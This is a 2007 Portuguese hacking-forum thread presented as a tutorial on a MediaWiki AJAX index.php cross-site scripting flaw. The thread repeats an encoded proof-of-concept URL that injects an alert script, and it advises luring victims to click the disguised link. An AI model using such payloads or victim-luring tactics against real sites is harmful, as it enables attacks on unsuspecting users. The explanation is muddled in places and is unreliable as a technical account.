Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: Anonymous on 19 de February , 2007, 06:30:01 PM

Title: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: Anonymous on 19 de February , 2007, 06:30:01 PM
Olá.

Hoje irei postar uma Vulnerabilidade MediaWiki AJAX Index.PHP Cross-Site Scripting Vulnerability

Achei no site SecurityFocus e tambem muito Interessante.

É o seguinte como ele funciona?

A pessoa que vai usar o ataque deve seduzir um usuário qualquer para seguira URL maliciosa. A seguinte URL no exemplo prova o conceito.

http://www.exemplo.com/wiki/index.php?a ... D%2F%53%43 (http://www.exemplo.com/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43)
%52%49%50%54%2B%41%44%34%2D

Na qual o site http://www.example.com/wiki/index.php? que vai ser usado a Vulnerabilidade.

Mais um Codigo feitas naquelas URL: %2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43
%52%49%50%54%2B%41%44%34%2D

Entao quando a pessoa entrar no site sera enviada para a qual voce Programou.

Nisso voce pode usar varias Seing , olha o exemplo:

http://www.exemplo.com/wiki/index.php? (//http)

Espero que tenha gostado.
Title: Re: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: lcs on 19 de February , 2007, 07:36:49 PM
o que ele faz exatamente? ele grava no navegador o endereço da pagina falsa dizendo que eh o original?
Title: Re: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: Anonymous on 19 de February , 2007, 07:48:31 PM
Vo tentar explicar mais simplificadamente.

Vamos supor que esse site abaixo esteje Vulneravel:

http://www.lcs/wiki/index.php (http://www.lcs/wiki/index.php)?

Então podemos usar um xss na pagina.

http://www.lcs/wiki/index.php?action=aj ... D%2F%53%43 (http://www.lcs/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43)
%52%49%50%54%2B%41%44%34%2D

No caso veje abaixo a imagem:

(//http://img470.imageshack.us/img470/5701/cssxsste4.jpg) (//http://imageshack.us)

Sobre, o modo de encriptação sera apenas um modo de enganar a pessoa, ou seja voce num vai por www.orkut.com (http://www.orkut.com)

%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43
%52%49%50%54%2B%41%44%34%2D
Title: Re: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: lcs on 19 de February , 2007, 07:53:32 PM
humm squei agora..
Title: Re: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: Anonymous on 19 de February , 2007, 07:56:44 PM
Desculpe por qualquer coisa, é que estou aprendendo e o meu modo explicativo sai ruim de vez em quando rsrs
Title: Re: [Tutorial] CSS em MediaWiki AJAX Index.PHP
Post by: eb0x on 23 de February , 2007, 03:51:37 AM
Se preocupa nao, o importante é estar estudando.
E a intenção de ajudar, que sei que vc tem.

format pro C
Text only | Text with Images